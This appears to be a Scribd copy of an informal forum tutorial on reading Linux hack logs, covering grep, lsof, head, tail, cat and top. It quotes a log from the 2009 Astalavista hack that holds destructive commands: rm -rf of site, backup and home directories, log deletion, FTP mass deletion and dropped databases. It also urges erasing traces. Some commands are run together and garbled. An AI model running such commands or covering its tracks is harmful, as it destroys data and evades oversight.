0% found this document useful (0 votes)
98 views5 pages

This Document Has Been Written in Response On How To Read A Hack Log Which Is A Linux File For The Members of Hackers Arena

This document provides instructions on how to read Linux hack logs to understand intrusions. It explains that hack logs record terminal commands and can reveal how a system was compromised. It then lists and describes useful commands for analyzing logs, including grep to search files, lsof to view open files/ports, head and tail to view file beginnings/ends, cat to output file contents, and top to view running processes. It concludes by summarizing commands from an example hack log that deleted website files, backups, user folders, and database tables to completely remove the compromised site.

Uploaded by

Haarrvin Gvr
Copyright
© Attribution Non-Commercial (BY-NC)
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as DOC, PDF, TXT or read online on Scribd
0% found this document useful (0 votes)
98 views5 pages

This Document Has Been Written in Response On How To Read A Hack Log Which Is A Linux File For The Members of Hackers Arena

This document provides instructions on how to read Linux hack logs to understand intrusions. It explains that hack logs record terminal commands and can reveal how a system was compromised. It then lists and describes useful commands for analyzing logs, including grep to search files, lsof to view open files/ports, head and tail to view file beginnings/ends, cat to output file contents, and top to view running processes. It concludes by summarizing commands from an example hack log that deleted website files, backups, user folders, and database tables to completely remove the compromised site.

Uploaded by

Haarrvin Gvr
Copyright
© Attribution Non-Commercial (BY-NC)
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as DOC, PDF, TXT or read online on Scribd
You are on page 1/ 5

This document has been written in response on how to read a hack log which is a linux file For the

the members of HacKeRS ArEnA


hack log -- All of your typed commands are saved in a history file named .bash_history, and once the system has been compromised and databases dumped, that history serves as a log of how the hack went down. As such, they are often released with notes and comments after such attack is performed ! i.e. U will get caught if u hack a linux server without knowing how to erase ur traces !!!! :D Now these r some of the commands that will hel[p u read hack logs more easily ---
Grep $ grep[options][pattern][file] Grep is a tool to search for strings in a file (and so much more). Let's say you just downloaded a huge password dump and you need to locate a specific account. Grep is your tool. You can also pipe and redirect output from one command into grep to narrow down the information you need. It then highlights the string on most distros. Perhaps you need to locate a specific Firefox process running, you could type: $ ps -e
And sift through the possibly long list it returns, or you can: $ ps -e | grep[string]

Notice the pipe operator | is placed between the commands in the order the data should travel.

Lsof $ lsof [string]


Lsof lists open files. This might seem rather lackluster, until you remember that everything is considered a file in Linux. You can see open TCP ports by using: $ lsof | grepTCP

Notice how useful grep and pipes are? This is also the same data from: $ lsof -i

HeadsandTails $head[file] $ tail [file] These two commands allow us to view the first (head) and last (tail) ten lines of the specified file(s).

Here, we took the sqlmap.conf file and printed out the first and last ten lines. Often, when you've rooted a box, you know the order or certain log files and configs. It ends up being much faster to read the output with these commands then to open a file up in vim.

Cat $ cat [options][file]


Cat is short for concatenate and it will print out a file to standard outputyour monitor in most cases.

This is useful if you need to view the contents of a small file quickly on the screen.

Top $ top
Top displays the running information of processes, uptime, and more. It's useful for seeing what's running when you're performing recon on a server.

While top is running, you can press the 'h' key to bring up a help screen with a list of commands, some of the more useful ones are: u[username] To display only the processes belonging to the user. Use + or blank to see all users. k[pid] Kill the process with pid. Let's take an example from the 2009 Astalavista hack by AntiSec. After exploiting their Light Speed HTTP daemon to get into the Apache account, they used a local privilege escalation exploit to gain root access. This is pretty much the end of the machine. Once someone has escalated their privileges to root, they own the box. They can install rootkits, keyloggers, bots, deface website, etc.

sh-3.2#rm-rf backup/ sh-3.2#rm-rf backup.14161/ sh-3.2#rm-rf ftp/ sh-3.2#rm-rf jon/ sh-3.2#rm-rf my/ sh-3.2#rm-rf mysqldata/ sh-3.2#rm-rf test/ sh-3.2#rm-rf tmp/ sh-3.2#cd~ sh-3.2#rmrf * sh-3.2#rmrf /var/log/ rm: cannot remove directory `/var/log//proftpd': sh-3.2# rm -rf /home/* ftp>cdastalavista.com 250 CWD command successful. ftp>ls-la [snip] ftp> mdelete* mysql>drop database astanet_membersystem; mysql>drop database com_contrexx; mysql>drop database com_contrexx2; mysql>drop database com_contrexx2_live; mysql>drop database ideapool; mysql>drop database yourmaster; mysql>drop database astanet_ads; mysql>drop database astanet_mailing_lists; mysql>dropdatabaseastanet_mediawiki; Basically, they did the following: 1. 2. 3. 4. 5. Delete the local website, scripts and pages. Delete the temp, test and logs. Delete the user folders.

Directory

not

empty

Connected to the FTP backup site and deleted the backups. Connected to the Database and dropped all the website database tables.

They removed any existence of this website.

In Closing
Looking over the commands and the order they were completed in will help make sense of what hacking really is. Hollywood and the media does a great job of

making it seem like it's a mere few clicks of a mouse, a bunch of scrolling text, and some nefarious looking teenager saying "were in". If you read over the hack logs, you might have noticed a lot of the work involved was actually on the databases

You might also like